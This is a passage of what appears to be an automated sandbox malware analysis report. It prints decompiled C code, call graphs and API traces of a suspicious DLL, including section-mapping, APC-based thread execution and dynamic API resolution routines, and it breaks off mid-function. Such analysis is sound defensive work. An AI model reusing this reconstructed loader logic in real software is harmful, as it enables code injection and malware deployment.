                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpy$AllocateHeap
                                          • String ID:
                                          • API String ID: 2411391700-0
                                          • Opcode ID: 8c6be8f3b980ded6b205a1427aecf0c4be46124430f3a58618e79d9fd503a6bc
                                          • Instruction ID: aba153511f18050926eae0e99bc6aa379b0c0247eeaba9f9b84b923fb60753f3
                                          • Opcode Fuzzy Hash: 8c6be8f3b980ded6b205a1427aecf0c4be46124430f3a58618e79d9fd503a6bc
                                          • Instruction Fuzzy Hash: 8DF0EC76900119BB8B119FA9CC85CDF7BACEF093947158066BA08D7212E775EA149BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C79DEF, Relevance: 5.0, APIs: 4, Instructions: 24stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(?,00000000,00000000,00C75335,616D692F,00000000), ref: 00C79DFB
                                          • lstrlen.KERNEL32(?), ref: 00C79E03
                                            • Part of subcall function 00C758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00C71C51), ref: 00C758CA
                                          • lstrcpy.KERNEL32(00000000,?), ref: 00C79E1A
                                          • lstrcat.KERNEL32(00000000,?), ref: 00C79E25
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                          • String ID:
                                          • API String ID: 74227042-0
                                          • Opcode ID: 73b0c1d76641f512dda10548cab9edfe81459c6d96bd915168065c61a8e28ff2
                                          • Instruction ID: 8978f680462b89700fbc6777da0d3fc4109c51a83bb9415e9e755eae67f2c58b
                                          • Opcode Fuzzy Hash: 73b0c1d76641f512dda10548cab9edfe81459c6d96bd915168065c61a8e28ff2
                                          • Instruction Fuzzy Hash: C8E04833805622EB87226BA4AC48D8FBFA9FF89350705891AF65893124C731C915DBD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Analysis Process: regsvr32.exe PID: 3556 Parent PID: 2880 regsvr32.exeCOMMON

                                          Callgraph

                                          Executed Functions

                                          Function 00401A34, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 98 401a34-401a96 NtCreateSection 99 401a98-401aa1 call 4010ba 98->99 100 401acd-401ad1 98->100 103 401aa6-401aaa 99->103 104 401ad3-401ad9 100->104 105 401ac5-401acb 103->105 106 401aac-401ac3 memset 103->106 105->104 106->104
                                          C-Code - Quality: 72%
                                          			E00401A34(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E004010BA(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                                          0x00401a3d
                                          0x00401a44
                                          0x00401a45
                                          0x00401a46
                                          0x00401a47
                                          0x00401a48
                                          0x00401a59
                                          0x00401a5d
                                          0x00401a71
                                          0x00401a74
                                          0x00401a77
                                          0x00401a7e
                                          0x00401a81
                                          0x00401a88
                                          0x00401a8b
                                          0x00401a8e
                                          0x00401a91
                                          0x00401a96
                                          0x00401ad1
                                          0x00401a98
                                          0x00401a9b
                                          0x00401aa1
                                          0x00401aa6
                                          0x00401aaa
                                          0x00401ac8
                                          0x00401aac
                                          0x00401ab3
                                          0x00401ac1
                                          0x00401ac1
                                          0x00401aaa
                                          0x00401ad9

                                          APIs
                                          • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 00401A91
                                            • Part of subcall function 004010BA: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?), ref: 004010E7
                                          • memset.NTDLL ref: 00401AB3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.519021404.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000002.00000002.519077118.0000000000405000.00000040.00020000.sdmp Download File
                                          • Associated: 00000002.00000002.519121092.0000000000407000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_regsvr32.jbxd
                                          Similarity
                                          • API ID: Section$CreateViewmemset
                                          • String ID: @
                                          • API String ID: 2533685722-2766056989
                                          • Opcode ID: f77f55ab3ccb546c3d8c576f84e5351407dfacedabb99d7fd493fd0a52462a6f
                                          • Instruction ID: 471401f0b8c6b4b7cc2e8332a800b59de25362df95d7a1f7f52e8276a5367227
                                          • Opcode Fuzzy Hash: f77f55ab3ccb546c3d8c576f84e5351407dfacedabb99d7fd493fd0a52462a6f
                                          • Instruction Fuzzy Hash: 2721F9B1E00209AFCB11DFA9C8849DEFBB9EF48354F10443AE616F3250D735AA458FA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004010BA, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 139 4010ba-4010ec NtMapViewOfSection 140 4010f2 139->140 141 4010ee-4010f0 139->141 142 4010f6-4010f9 140->142 141->142
                                          C-Code - Quality: 68%
                                          			E004010BA(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                                          0x004010cc
                                          0x004010d2
                                          0x004010e0
                                          0x004010e7
                                          0x004010ec
                                          0x004010f2
                                          0x00000000
                                          0x004010f3
                                          0x00000000

                                          APIs
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?), ref: 004010E7
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.519021404.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000002.00000002.519077118.0000000000405000.00000040.00020000.sdmp Download File
                                          • Associated: 00000002.00000002.519121092.0000000000407000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_regsvr32.jbxd
                                          Similarity
                                          • API ID: SectionView
                                          • String ID:
                                          • API String ID: 1323581903-0
                                          • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                          • Instruction ID: 10958ca1104106c1f1914508b01f5b68205e6ea8213fc9395d66977e5d822f6c
                                          • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                          • Instruction Fuzzy Hash: 79F012B590020CBFDB119FA5CC85C9FBBBDEB44394B10893AB152E14A0D6319E489A60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004011D4, Relevance: 22.6, APIs: 15, Instructions: 112threadsleepsynchronizationCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 85%
                                          			E004011D4(void* __ecx, void* __edx, void* __edi, long _a4) {
				long _v8;
				void* _v32;
				long _t21;
				long _t23;
				long _t25;
				void* _t26;
				long _t29;
				long _t30;
				long _t34;
				void* _t39;
				intOrPtr _t42;
				void* _t47;
				void* _t52;
				signed int _t55;
				void* _t57;
				intOrPtr* _t58;

				_t47 = __ecx;
				_t21 = E0040179C();
				_v8 = _t21;
				if(_t21 != 0) {
					return _t21;
				}
				do {
					_t55 = SwitchToThread() + 8;
					_t23 = E00401B6F(__edi, _t55); // executed
					_v8 = _t23;
					Sleep(0x20 + _t55 * 4); // executed
					_t25 = _v8;
				} while (_t25 == 0xc);
				if(_t25 != 0) {
					L21:
					return _t25;
				}
				_push(__edi);
				if(_a4 != 0) {
					L11:
					_t26 = CreateThread(0, 0, __imp__SleepEx,  *0x404140, 0, 0); // executed
					_t57 = _t26;
					if(_t57 == 0) {
						L18:
						_v8 = GetLastError();
						L19:
						_t25 = _v8;
						if(_t25 == 0xffffffff) {
							_t25 = GetLastError();
						}
						goto L21;
					}
					_t29 = QueueUserAPC(E004016E4, _t57,  &_v32); // executed
					if(_t29 == 0) {
						_t34 = GetLastError();
						_a4 = _t34;
						TerminateThread(_t57, _t34);
						CloseHandle(_t57);
						_t57 = 0;
						SetLastError(_a4);
					}
					if(_t57 == 0) {
						goto L18;
					} else {
						_t30 = WaitForSingleObject(_t57, 0xffffffff);
						_v8 = _t30;
						if(_t30 == 0) {
							GetExitCodeThread(_t57,  &_v8);
						}
						CloseHandle(_t57);
						goto L19;
					}
				}
				if(E0040130B(_t47,  &_a4) != 0) {
					 *0x404138 = 0;
					goto L11;
				}
				_t58 = __imp__GetLongPathNameW;
				_t39 =  *_t58(_a4, 0, 0); // executed
				_t52 = _t39;
				if(_t52 == 0) {
					L9:
					 *0x404138 = _a4;
					goto L11;
				}
				_t10 = _t52 + 2; // 0x2
				_t42 = E00401026(_t52 + _t10);
				 *0x404138 = _t42;
				if(_t42 == 0) {
					goto L9;
				}
				 *_t58(_a4, _t42, _t52); // executed
				E00401938(_a4);
				goto L11;
			}



















                                          0x004011d4
                                          0x004011db
                                          0x004011e2
                                          0x004011e7
                                          0x00401308
                                          0x00401308
                                          0x004011ee
                                          0x004011f6
                                          0x004011fa
                                          0x004011ff
                                          0x0040120a
                                          0x00401210
                                          0x00401213
                                          0x0040121a
                                          0x00401305
                                          0x00000000
                                          0x00401305
                                          0x00401220
                                          0x00401224
                                          0x0040127a
                                          0x0040128a
                                          0x00401290
                                          0x0040129a
                                          0x004012f5
                                          0x004012f7
                                          0x004012fa
                                          0x004012fa
                                          0x00401301
                                          0x00401303
                                          0x00401303
                                          0x00000000
                                          0x00401301
                                          0x004012a6
                                          0x004012b4
                                          0x004012b6
                                          0x004012ba
                                          0x004012bd
                                          0x004012c4
                                          0x004012c9
                                          0x004012cb
                                          0x004012cb
                                          0x004012d3
                                          0x00000000
                                          0x004012d5
                                          0x004012d8
                                          0x004012de
                                          0x004012e3
                                          0x004012ea
                                          0x004012ea
                                          0x004012f1
                                          0x00000000
                                          0x004012f1
                                          0x004012d3
                                          0x00401231
                                          0x00401274
                                          0x00000000
                                          0x00401274
                                          0x00401233
                                          0x0040123e
                                          0x00401240
                                          0x00401244
                                          0x0040126a
                                          0x0040126d
                                          0x00000000
                                          0x0040126d
                                          0x00401246
                                          0x0040124b
                                          0x00401250
                                          0x00401257
                                          0x00000000
                                          0x00000000
                                          0x0040125e
                                          0x00401263
                                          0x00000000

                                          APIs
                                            • Part of subcall function 0040179C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,004011E0), ref: 004017AB
                                            • Part of subcall function 0040179C: GetVersion.KERNEL32(?,004011E0), ref: 004017BA
                                            • Part of subcall function 0040179C: GetCurrentProcessId.KERNEL32(?,004011E0), ref: 004017D6
                                            • Part of subcall function 0040179C: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,004011E0), ref: 004017EF
                                          • SwitchToThread.KERNEL32 ref: 004011EE
                                            • Part of subcall function 00401B6F: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000004,00000000,?,-00000008,-00000008), ref: 00401BC5
                                            • Part of subcall function 00401B6F: memcpy.NTDLL(?,?,-00000008,?,?,?,?,?,?,?,?,004011FF,-00000008), ref: 00401C57
                                            • Part of subcall function 00401B6F: VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00401C72
                                          • Sleep.KERNEL32(00000000,-00000008), ref: 0040120A
                                          • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 0040123E
                                          • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 0040125E
                                          • CreateThread.KERNEL32 ref: 0040128A
                                          • QueueUserAPC.KERNEL32(004016E4,00000000,?), ref: 004012A6
                                          • GetLastError.KERNEL32 ref: 004012B6
                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 004012BD
                                          • CloseHandle.KERNEL32(00000000), ref: 004012C4
                                          • SetLastError.KERNEL32(?), ref: 004012CB
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004012D8
                                          • GetExitCodeThread.KERNEL32(00000000,?), ref: 004012EA
                                          • CloseHandle.KERNEL32(00000000), ref: 004012F1
                                          • GetLastError.KERNEL32 ref: 004012F5
                                          • GetLastError.KERNEL32 ref: 00401303
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.519021404.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000002.00000002.519077118.0000000000405000.00000040.00020000.sdmp Download File
                                          • Associated: 00000002.00000002.519121092.0000000000407000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_regsvr32.jbxd
                                          Similarity
                                          • API ID: ErrorLastThread$CloseCreateHandleLongNamePathProcessVirtual$AllocCodeCurrentEventExitFreeObjectOpenQueueSingleSleepSwitchTerminateUserVersionWaitmemcpy
                                          • String ID:
                                          • API String ID: 3896949738-0
                                          • Opcode ID: fd35b077739daf7847114f9f346be5ede622197cae8833bd08c1554a8ffecee1
                                          • Instruction ID: c3a5eca2a66aa5e7bbaa8b49f19a45a5b77f58551790e7c1cf36b2dcd64879de
                                          • Opcode Fuzzy Hash: fd35b077739daf7847114f9f346be5ede622197cae8833bd08c1554a8ffecee1
                                          • Instruction Fuzzy Hash: 16315071801118BFDB11AFB5DD889AF7EACEB08395710417AF905F72B4D7388E419BA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004010FC, Relevance: 13.6, APIs: 9, Instructions: 81filetimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 69%
                                          			E004010FC(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L00402180();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x404144;
				_push(_t15 + 0x40505e);
				_push(_t15 + 0x405054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L0040217A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x404148, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}














                                          0x004010fc
                                          0x00401105
                                          0x00401109
                                          0x0040110f
                                          0x00401114
                                          0x00401119
                                          0x0040111c
                                          0x0040111f
                                          0x00401124
                                          0x00401125
                                          0x00401128
                                          0x00401133
                                          0x0040113a
                                          0x0040113e
                                          0x00401140
                                          0x00401141
                                          0x00401144
                                          0x00401149
                                          0x00401153
                                          0x00401155
                                          0x00401155
                                          0x00401169
                                          0x0040116f
                                          0x00401173
                                          0x004011c3
                                          0x00401175
                                          0x0040117e
                                          0x00401194
                                          0x0040119c
                                          0x004011ae
                                          0x004011b2
                                          0x00000000
                                          0x00000000
                                          0x0040119e
                                          0x004011a1
                                          0x004011a6
                                          0x004011a8
                                          0x004011a8
                                          0x00401189
                                          0x0040118b
                                          0x004011b4
                                          0x004011b5
                                          0x004011b5
                                          0x0040117e
                                          0x004011cb

                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00401109
                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0040111F
                                          • _snwprintf.NTDLL ref: 00401144
                                          • CreateFileMappingW.KERNELBASE(000000FF,00404148,00000004,00000000,?,?), ref: 00401169
                                          • GetLastError.KERNEL32 ref: 00401180
                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 00401194
                                          • GetLastError.KERNEL32 ref: 004011AC
                                          • CloseHandle.KERNEL32(00000000), ref: 004011B5
                                          • GetLastError.KERNEL32 ref: 004011BD
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.519021404.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000002.00000002.519077118.0000000000405000.00000040.00020000.sdmp Download File
                                          • Associated: 00000002.00000002.519121092.0000000000407000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_regsvr32.jbxd
                                          Similarity
                                          • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                          • String ID:
                                          • API String ID: 1724014008-0
                                          • Opcode ID: 10781628c56b613e53fd0cec9fa96b362338ff09033fe3b660c77061631cefb2
                                          • Instruction ID: ef5076f750e2cd4e4e98990b3d3664116a4674d5ffa79623b8c505300cb00d24
                                          • Opcode Fuzzy Hash: 10781628c56b613e53fd0cec9fa96b362338ff09033fe3b660c77061631cefb2
                                          • Instruction Fuzzy Hash: 2C2198B2600108BFD714AF94DC84E9E3BADEB88355F104136FB15FB2E0D6745D458B69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401954, Relevance: 10.6, APIs: 7, Instructions: 74memorythreadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 45 401954-401968 46 40196a-40196b 45->46 47 4019dd-4019ea InterlockedDecrement 45->47 48 401971-40197e InterlockedIncrement 46->48 49 401a2a-401a31 46->49 47->49 50 4019ec-4019f2 47->50 48->49 51 401984-401998 HeapCreate 48->51 52 4019f4 50->52 53 401a1e-401a24 HeapDestroy 50->53 55 4019d8-4019db 51->55 56 40199a-4019cf call 40105a CreateThread 51->56 54 4019f9-401a09 SleepEx 52->54 53->49 57 401a12-401a18 CloseHandle 54->57 58 401a0b-401a10 54->58 55->49 56->49 61 4019d1-4019d4 56->61 57->53 58->54 58->57 61->55
                                          C-Code - Quality: 89%
                                          			_entry_(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x404108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x40410c;
						if( *0x40410c != 0) {
							_t36 = 0x2710;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x404118;
								if( *0x404118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x40410c);
						}
						HeapDestroy( *0x404110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x404108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x404110 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x404130 = _a4;
							asm("lock xadd [eax], ebx");
							_t23 = CreateThread(0, 0, E0040103B, E0040105A(_a12, 0, 0x404118, _t41), 0,  &_a8); // executed
							 *0x40410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}












                                          0x00401957
                                          0x00401963
                                          0x00401965
                                          0x00401968
                                          0x004019e2
                                          0x004019e8
                                          0x004019ea
                                          0x004019ec
                                          0x004019f2
                                          0x004019f4
                                          0x004019f9
                                          0x004019fc
                                          0x00401a07
                                          0x00401a09
                                          0x00000000
                                          0x00000000
                                          0x00401a0b
                                          0x00401a0e
                                          0x00401a10
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00401a10
                                          0x00401a18
                                          0x00401a18
                                          0x00401a24
                                          0x00401a24
                                          0x0040196a
                                          0x0040196b
                                          0x0040198b
                                          0x00401991
                                          0x00401996
                                          0x00401998
                                          0x004019d8
                                          0x004019d8
                                          0x0040199a
                                          0x004019a2
                                          0x004019a9
                                          0x004019c2
                                          0x004019c8
                                          0x004019cf
                                          0x004019d4
                                          0x00000000
                                          0x004019d4
                                          0x004019cf
                                          0x00401998
                                          0x0040196b
                                          0x00401a31

                                          APIs
                                          • InterlockedIncrement.KERNEL32(00404108), ref: 00401976
                                          • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 0040198B
                                          • CreateThread.KERNEL32 ref: 004019C2
                                          • InterlockedDecrement.KERNEL32(00404108), ref: 004019E2
                                          • SleepEx.KERNEL32(00000064,00000001), ref: 004019FC
                                          • CloseHandle.KERNEL32 ref: 00401A18
                                          • HeapDestroy.KERNEL32 ref: 00401A24
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.519021404.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000002.00000002.519077118.0000000000405000.00000040.00020000.sdmp Download File
                                          • Associated: 00000002.00000002.519121092.0000000000407000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_regsvr32.jbxd
                                          Similarity
                                          • API ID: CreateHeapInterlocked$CloseDecrementDestroyHandleIncrementSleepThread
                                          • String ID:
                                          • API String ID: 3416589138-0
                                          • Opcode ID: 44ccef76f4ce31eeeca5324c3b88906bc10cd886d3300b2955b61f5ac9214176
                                          • Instruction ID: a0ab11432e77b84ae515e188bafeff82c6af5491473b460d6bc066eb84a28543
                                          • Opcode Fuzzy Hash: 44ccef76f4ce31eeeca5324c3b88906bc10cd886d3300b2955b61f5ac9214176
                                          • Instruction Fuzzy Hash: 6D2180B1701205AFC7109F69AD88A6A7BA8F7E5751714413AF601F72A0E6788D408F58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401F61, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 100%
                                          			E00401F61(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t32;
				_Unknown_base(*)()* _t35;
				_Unknown_base(*)()* _t38;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00401026(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t48 = GetModuleHandleA( *0x404144 + 0x405014);
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48,  *0x404144 + 0x40514c);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00401938(_t54);
					} else {
						_t32 = GetProcAddress(_t48,  *0x404144 + 0x40515c);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t35 = GetProcAddress(_t48,  *0x404144 + 0x40516f);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t38 = GetProcAddress(_t48,  *0x404144 + 0x405184);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t41 = GetProcAddress(_t48,  *0x404144 + 0x40519a);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00401A34(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












                                          0x00401f70
                                          0x00401f74
                                          0x00402036
                                          0x00401f7a
                                          0x00401f92
                                          0x00401fa1
                                          0x00401fa8
                                          0x00401faa
                                          0x00401faf
                                          0x0040202e
                                          0x0040202f
                                          0x00401fb1
                                          0x00401fbe
                                          0x00401fc0
                                          0x00401fc5
                                          0x00000000
                                          0x00401fc7
                                          0x00401fd4
                                          0x00401fd6
                                          0x00401fdb
                                          0x00000000
                                          0x00401fdd
                                          0x00401fea
                                          0x00401fec
                                          0x00401ff1
                                          0x00000000
                                          0x00401ff3
                                          0x00402000
                                          0x00402002
                                          0x00402007
                                          0x00000000
                                          0x00402009
                                          0x0040200f
                                          0x00402014
                                          0x0040201b
                                          0x00402020
                                          0x00402025
                                          0x00000000
                                          0x00402027
                                          0x0040202a
                                          0x0040202a
                                          0x00402025
                                          0x00402007
                                          0x00401ff1
                                          0x00401fdb
                                          0x00401fc5
                                          0x00401faf
                                          0x00402044

                                          APIs
                                            • Part of subcall function 00401026: HeapAlloc.KERNEL32(00000000,?,00401329,00000208,?,-00000008,?,?,?,0040122F,?), ref: 00401032
                                          • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,00401B06,?,?,?,?,00000002,?,0040178F), ref: 00401F86
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401FA8
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401FBE
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401FD4
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401FEA
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00402000
                                            • Part of subcall function 00401A34: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 00401A91
                                            • Part of subcall function 00401A34: memset.NTDLL ref: 00401AB3
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.519021404.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000002.00000002.519077118.0000000000405000.00000040.00020000.sdmp Download File
                                          • Associated: 00000002.00000002.519121092.0000000000407000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_regsvr32.jbxd
                                          Similarity
                                          • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                          • String ID:
                                          • API String ID: 1632424568-0
                                          • Opcode ID: bdecdfe8be8964bc3f68c73273cd601846a070c5aeaf0cc420d3301f83d310a9
                                          • Instruction ID: 7231f389cd8be8db14db85a4f8175327975b3e6d23b460530a12d7a5a8207ee9
                                          • Opcode Fuzzy Hash: bdecdfe8be8964bc3f68c73273cd601846a070c5aeaf0cc420d3301f83d310a9
                                          • Instruction Fuzzy Hash: 432119B060070AAFD721DF69DE48E6BB7ECEB543447004076E605EB2A1E6B4E905CF68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401B6F, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 79 401b6f-401b90 call 401c8a 82 401c82-401c87 79->82 83 401b96-401bd0 VirtualAlloc 79->83 84 401bd6-401bdc 83->84 85 401c7a 83->85 87 401c42 84->87 88 401bde-401bf4 84->88 86 401c81 85->86 86->82 89 401c47-401c4c 87->89 90 401bf9-401c3d call 401908 88->90 91 401c61 89->91 92 401c4e-401c5f memcpy 89->92 96 401bf6 90->96 97 401c3f-401c40 90->97 94 401c68-401c78 VirtualFree 91->94 92->94 94->86 96->90 97->89
                                          C-Code - Quality: 83%
                                          			E00401B6F(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				unsigned int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
